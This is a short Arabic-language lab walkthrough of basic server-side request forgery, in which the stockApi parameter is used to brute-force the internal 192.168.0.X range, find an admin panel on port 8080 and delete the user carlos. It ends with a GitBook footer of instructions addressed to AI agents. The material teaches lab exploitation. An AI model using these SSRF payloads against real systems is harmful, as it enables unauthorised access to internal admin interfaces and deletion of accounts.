> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/web/ssrf/basic-ssrf-against-internal-system.md).

# SSRF أساسي ضد نظام داخلي

## SSRF أساسي ضد نظام خلفي آخر

توفّر هذه المختبرية ميزة للتحقق من المخزون تستعلم خدمة داخلية. / الهدف هو استخدام هذه الآلية لاستكشاف النطاق الداخلي **192.168.0.X** للبحث عن واجهة إدارية على المنفذ **8080**، ثم احذف المستخدم carlos.

#### **التحليل والاستغلال**

* الـ **stockApi** يُرسَل المعامل إلى **Intruder** لأتمتة اختبار العنوان الداخلي:

```javascript
stockApi=http://192.168.0.§1§:8080/admin
```

<figure><img src="/files/d177ad7d1e01369a6d5b2df121998a66f87e3e62" alt=""><figcaption></figcaption></figure>

يتم تنفيذ هجوم بالقوة الغاشمة تقريبي على **254 عنوانًا ممكنًا** من النطاق الداخلي، وكلها مع المسار /admin.

يتم تنزيل قاموس قيم لتشغيل الهجوم:

```bash
wget https://gist.githubusercontent.com/danielthall/09b8f173b5c0b84065d8e211def83c0b/raw/20d713765b3fa620c09aebd36e41ce69debef865/0-1000.txt
```

* بعد إطلاق الهجوم، **192.168.0.14** يُرجِع العنوان \*\*رمز HTTP 200\*\*، مما يشير إلى أن واجهة الإدارة متاحة.

<figure><img src="/files/404b461aedb3c9deb3f63f5ce826a94556a73e93" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/792bc52be6426ce080ff52aecdc7ea0e1d863179" alt="" width="563"><figcaption></figcaption></figure>

#### **حذف المستخدم**

* الوصول إلى لوحة الإدارة:

```javascript
stockApi=http://192.168.0.14:8080/admin
stockApi=http://192.168.0.14:8080/admin/delete?username=carlos
```

<figure><img src="/files/541efed1b7c108ebe0b4a3a410202a3bc58a5fbf" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/web/ssrf/basic-ssrf-against-internal-system.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
